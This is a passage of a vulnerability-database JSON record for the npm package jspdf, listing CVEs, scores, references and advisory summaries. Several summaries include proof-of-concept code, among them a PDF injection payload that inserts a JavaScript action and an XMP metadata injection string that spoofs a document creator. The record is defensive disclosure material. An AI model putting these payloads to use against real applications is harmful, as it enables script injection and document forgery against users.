"generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25755" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md", "reference_id": "CVE-2026-25755.MD", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md" }, { "reference_url": "https://github.com/advisories/GHSA-9vjf-qc39-jprp", "reference_id": "GHSA-9vjf-qc39-jprp", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9vjf-qc39-jprp" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp", "reference_id": "GHSA-9vjf-qc39-jprp", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25755", "GHSA-9vjf-qc39-jprp" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hu3v-vhnb-kuhw" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49940?format=api", "vulnerability_id": "VCID-2555-3wmg-bke6", "summary": "jsPDF Vulnerable to Denial of Service (DoS) via Unvalidated BMP Dimensions in BMPDecoder\nUser control of the first argument of the `addImage` method results in Denial of Service.\n\nIf given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful BMP file that results in out of memory errors and denial of service. Harmful BMP files have large width and/or height entries in their headers, wich lead to excessive memory allocation.\n\nOther affected methods are: `html`.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\n// malicious BMP image data with large width/height headers\nconst payload = ...\n\nconst doc = new jsPDF();\n\ndoc.addImage(payload, \"BMP\", 0, 0, 100, 100);\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24133.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24133.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24133", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12242", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12353", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12317", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12234", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24133" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/ae4b93f76d8fc1baa5614bd5fdb5d174c3b85f0d", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/ae4b93f76d8fc1baa5614bd5fdb5d174c3b85f0d" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436135", "reference_id": "2436135", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436135" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24133", "reference_id": "CVE-2026-24133", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24133" }, { "reference_url": "https://github.com/advisories/GHSA-95fx-jjr5-f39c", "reference_id": "GHSA-95fx-jjr5-f39c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-95fx-jjr5-f39c" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-95fx-jjr5-f39c", "reference_id": "GHSA-95fx-jjr5-f39c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-95fx-jjr5-f39c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24133", "GHSA-95fx-jjr5-f39c" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2555-3wmg-bke6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49910?format=api", "vulnerability_id": "VCID-4rm1-7nm2-7kfn", "summary": "jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution\nUser control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.\n\nIf given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:\n\n* `AcroformChoiceField.addOption`\n* `AcroformChoiceField.setOptions`\n* `AcroFormCheckBox.appearanceState`\n* `AcroFormRadioButton.appearanceState`\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\nconst doc = new jsPDF();\n\nvar choiceField = new doc.AcroFormChoiceField();\nchoiceField.T = \"VulnerableField\";\nchoiceField.x = 20;\nchoiceField.y = 20;\nchoiceField.width = 100;\nchoiceField.height = 20;\n\n// PAYLOAD:\n// 1. Starts with \"/\" to bypass escaping.\n// 2. \"dummy]\" closes the array.\n// 3. \"/AA\" injects an Additional Action (Focus event).\n// 4. \"/JS\" executes arbitrary JavaScript.\nconst payload = \"/dummy] /AA << /Fo << /S /JavaScript /JS (app.alert('XSS')) >> >> /Garbage [\";\n\nchoiceField.addOption(payload);\ndoc.addField(choiceField);\n\ndoc.save(\"test.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24737.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24737.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24737", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06748", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06795", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.068", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06788", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06745", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24737" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/da291a5f01b96282545c9391996702cdb8879f79", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/da291a5f01b96282545c9391996702cdb8879f79" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436115", "reference_id": "2436115", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436115" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24737", "reference_id": "CVE-2026-24737", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24737" }, { "reference_url": "https://github.com/advisories/GHSA-pqxr-3g65-p328", "reference_id": "GHSA-pqxr-3g65-p328", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pqxr-3g65-p328" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-pqxr-3g65-p328", "reference_id": "GHSA-pqxr-3g65-p328", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-pqxr-3g65-p328" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4466", "reference_id": "RHSA-2026:4466", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4466" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4467", "reference_id": "RHSA-2026:4467", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4467" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24737", "GHSA-pqxr-3g65-p328" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4rm1-7nm2-7kfn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49949?format=api", "vulnerability_id": "VCID-g47z-ehg3-vqbb", "summary": "jsPDF Vulnerable to Stored XMP Metadata Injection (Spoofing & Integrity Violation)\nUser control of the first argument of the `addMetadata` function allows users to inject arbitrary XML.\n\nIf given the possibility to pass unsanitized input to the `addMetadata` method, a user can inject arbitrary XMP metadata into the generated PDF. If the generated PDF is signed, stored or otherwise processed after, the integrity of the PDF can no longer be guaranteed.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\nconst doc = new jsPDF()\n\n// Input a string that closes the current XML tag and opens a new one.\n// We are injecting a fake \"dc:creator\" (Author) to spoof the document source.\nconst maliciousInput = '</jspdf:metadata></rdf:Description>' +\n'<rdf:Description xmlns:dc=\"http://purl.org/dc/elements/1.1/\">' +\n'<dc:creator>TRUSTED_ADMINISTRATOR</dc:creator>' + // <--- Spoofed Identity\n'</rdf:Description>' +\n'<rdf:Description><jspdf:metadata>'\n\n// The application innocently adds the user's input to the metadata\ndoc.addMetadata(maliciousInput, \"http://valid.namespace\")\n\ndoc.save(\"test.pdf\")\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24043.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24043.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24043", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05281", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05299", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05282", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05276", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05237", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24043" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/efe54bf50f3f5e5416b2495e3c24624fc80b6cff", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/efe54bf50f3f5e5416b2495e3c24624fc80b6cff" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436149", "reference_id": "2436149", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436149" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24043", "reference_id": "CVE-2026-24043", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24043" }, { "reference_url": "https://github.com/advisories/GHSA-vm32-vv63-w422", "reference_id": "GHSA-vm32-vv63-w422", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vm32-vv63-w422" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-vm32-vv63-w422", "reference_id": "GHSA-vm32-vv63-w422", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-vm32-vv63-w422" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24043", "GHSA-vm32-vv63-w422" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g47z-ehg3-vqbb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49919?format=api", "vulnerability_id": "VCID-wg74-rver-pqa7", "summary": "jsPDF has Shared State Race Condition in addJS Plugin\nThe addJS method in the jspdf Node.js build utilizes a shared module-scoped variable (text) to store JavaScript content. When used in a concurrent environment (e.g., a Node.js web server), this variable is shared across all requests.\n\nIf multiple requests generate PDFs simultaneously, the JavaScript content intended for one user may be overwritten by a subsequent request before the document is generated. This results in Cross-User Data Leakage, where the PDF generated for User A contains the JavaScript payload (and any embedded sensitive data) intended for User B.\n\nTypically, this only affects server-side environments, although the same race conditions might occur if jsPDF runs client-side.\n\n```js\nimport { jsPDF } from \"jspdf\";\n\nconst docA = new jsPDF();\nconst docB = new jsPDF();\n\n// 1. User A sets their script (stored in shared 'text' variable)\ndocA.addJS('console.log(\"Secret A\");');\n\n// 2. User B sets their script (overwrites shared 'text' variable)\ndocB.addJS('console.log(\"Secret B\");');\n\n// 3. User A saves their PDF (reads current 'text' variable)\ndocA.save(\"userA.pdf\");\n\n// Result: userA.pdf contains \"Secret B\" instead of \"Secret A\"\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24040.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24040.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24040", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0344", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03464", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03478", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0346", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03439", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24040" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/2863e5c26afef211a545e8c174ab4d5fce3b8c0e", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/2863e5c26afef211a545e8c174ab4d5fce3b8c0e" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436133", "reference_id": "2436133", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436133" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24040", "reference_id": "CVE-2026-24040", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24040" }, { "reference_url": "https://github.com/advisories/GHSA-cjw8-79x6-5cj4", "reference_id": "GHSA-cjw8-79x6-5cj4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjw8-79x6-5cj4" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-cjw8-79x6-5cj4", "reference_id": "GHSA-cjw8-79x6-5cj4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-cjw8-79x6-5cj4" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4466", "reference_id": "RHSA-2026:4466", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4466" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4467", "reference_id": "RHSA-2026:4467", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4467" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24040", "GHSA-cjw8-79x6-5cj4" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wg74-rver-pqa7" } ], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" }